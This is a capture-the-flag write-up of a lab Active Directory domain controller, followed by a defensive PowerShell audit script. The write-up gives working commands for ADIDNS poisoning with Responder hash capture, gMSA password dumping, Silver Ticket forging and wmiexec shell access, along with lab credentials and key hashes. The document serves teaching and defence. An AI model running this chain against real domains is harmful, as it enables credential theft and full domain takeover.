Intelligence
Leveraged a gMSA misconfiguration affecting a user account to forge a Silver Ticket and become Domain Admin.
Summary
15 ports open including SMB, LDAP, Kerberos, RPC — confirmed Active Directory Domain Controller.
Extracted usernames from PDF metadata.
Used a date-based filename wordlist to download documents and uncover default password.
Validated credentials with crackmapexec and found access to SMB shares.
Discovered a PowerShell script scheduled to ping web* DNS entries, which enabled an ADIDNS attack.
Created a fake DNS record pointing to the attacker machine and captured an NTLM hash with Responder.
Cracked the NTLMv2 hash to get credentials for a high-privileged user.
BloodHound revealed Ted.Graves had ReadGMSAPassword on the svc_int account.
Dumped the gMSA password and created a Silver Ticket impersonating Administrator.
Used the Silver Ticket with wmiexec.py to get an Administrator shell.
🧵 Let's Unpack
🔍 Enumeration
Nmap Full Port Scan
sudo nmap -sC -sV -A -T5 -p- 10.10.10.248
The host is a Windows Domain Controller. Services of interest:
88/tcp open kerberos-sec
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open http Microsoft HTTPAPI
9389/tcp open mc-nmf
enum4linux
enum4linux -a 10.10.10.248
We confirmed guest access but got limited information.
📁 File-Based Enumeration
We brute-forced document paths with a custom date wordlist script:
# Generate filenames like 2020-06-01-upload.pdf
python dateGen.py 2020 2021 0 "-"
# Turn the gobuster hits (first column) into download URLs
awk '{print "http://10.10.10.248/documents" $1}' gobuster80 > docs.txt
wget -i docs.txt
Found default creds inside one PDF:
Username: Tiffany.Molina
Password: NewIntelligenceCorpUser9876
🔐 SMB Access
sudo crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb
Confirmed valid credentials.
smbmap -u "Tiffany.Molina" -p "NewIntelligenceCorpUser9876" -H 10.10.10.248
smbclient -U Tiffany.Molina //10.10.10.248/IT
Found a file named downdetector.ps1 — a scheduled script that monitors web DNS records and emails status updates to Ted.Graves@intelligence.htb using authenticated web requests.
🧨 Exploiting ADIDNS via Responder
Authenticated users can modify DNS via dnstool.py:
./dnstool.py -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248 -a add -r webl -d 10.10.14.13 -t A
Run Responder to intercept the NTLM hash:
responder -I tun0
Captured:
Username: Ted.Graves
NTLMv2 Hash: <hash>
🔑 Credential Cracking & BloodHound
Successfully cracked the hash, yielding cleartext credentials:
Username: Ted.Graves
Password: Mr.Teddy
Used bloodhound-python for enumeration:
bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c All
BloodHound revealed:
🧪 Ted.Graves ∈ ITSupport → has ReadGMSAPassword on svc_int
📦 Dump gMSA Password and Generate Silver Ticket
# Dumping gMSA password
./gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l 10.10.10.248
Output:
svc_int$:aes256-cts-hmac-sha1-96:285962204a4f54a092182cc51512bda5137de5b33becfd27797d079ba440e6d5
svc_int$:aes128-cts-hmac-sha1-96:cc50179e1ce82827a22ef0ad4fab3bd9
# Generate Silver Ticket as Administrator
impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :285962204a4f54a092182cc51512bda5137de5b33becfd27797d079ba440e6d5
🖥️ Administrator Shell via Silver Ticket
export KRB5CCNAME=Administrator.ccache
echo "10.10.10.248 dc.intelligence.htb" | sudo tee -a /etc/hosts
# Shell!
wmiexec.py -k -no-pass dc.intelligence.htb
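As an added defender-side check, not code from the writeup or from the box itself: a PowerShell audit, assuming the RSAT ActiveDirectory module on a domain-joined host, that lists who can read each gMSA's managed password (the ReadGMSAPassword edge BloodHound showed) and whether Authenticated Users can create records in the domain DNS zone (the condition dnstool.py relied on).

```powershell
# Added defensive audit (not part of the writeup): find the two conditions the
# chain above relied on, a user-reachable ReadGMSAPassword right and an ADIDNS
# zone that Authenticated Users may add records to. Assumes the RSAT
# ActiveDirectory module on a domain-joined host.
Import-Module ActiveDirectory
$Domain = Get-ADDomain

# Report every principal that can retrieve a gMSA's managed password. Groups are
# expanded recursively so a nested user (Ted.Graves via ITSupport) shows up.
function Get-GmsaReaderReport {
    $rows = foreach ($gmsa in Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword) {
        foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
            $grantee = Get-ADObject -Identity $dn -Properties sAMAccountName
            $targets = @($grantee)
            if ($grantee.ObjectClass -eq 'group') {
                $targets = Get-ADGroupMember -Identity $dn -Recursive
            }
            foreach ($t in $targets) {
                [pscustomobject]@{
                    gMSA      = $gmsa.SamAccountName
                    GrantedTo = $grantee.sAMAccountName
                    Principal = $t.SamAccountName
                    Class     = $t.ObjectClass
                }
            }
        }
    }
    $rows
}

# Flag Authenticated Users holding CreateChild on the domain DNS zone (the
# default that lets any domain user register a web* record). Adjust $zoneDn if
# the zone is stored in ForestDnsZones instead of DomainDnsZones.
function Test-AdidnsZoneAcl {
    $zoneDn = "DC=$($Domain.DNSRoot),CN=MicrosoftDNS,DC=DomainDnsZones,$($Domain.DistinguishedName)"
    $createChild = [System.DirectoryServices.ActiveDirectoryRights]::CreateChild
    (Get-Acl -Path "AD:\$zoneDn").Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -like '*Authenticated Users' -and
        (($_.ActiveDirectoryRights -band $createChild) -ne 0)
    }
}

# User accounts able to read a gMSA password are the finding to act on: restrict
# PrincipalsAllowedToRetrieveManagedPassword to the computer accounts that run
# the service, and tighten the zone ACL if the second check returns a row.
Get-GmsaReaderReport | Where-Object { $_.Class -eq 'user' } | Format-Table -AutoSize
Test-AdidnsZoneAcl | Format-Table IdentityReference, ActiveDirectoryRights -AutoSize
```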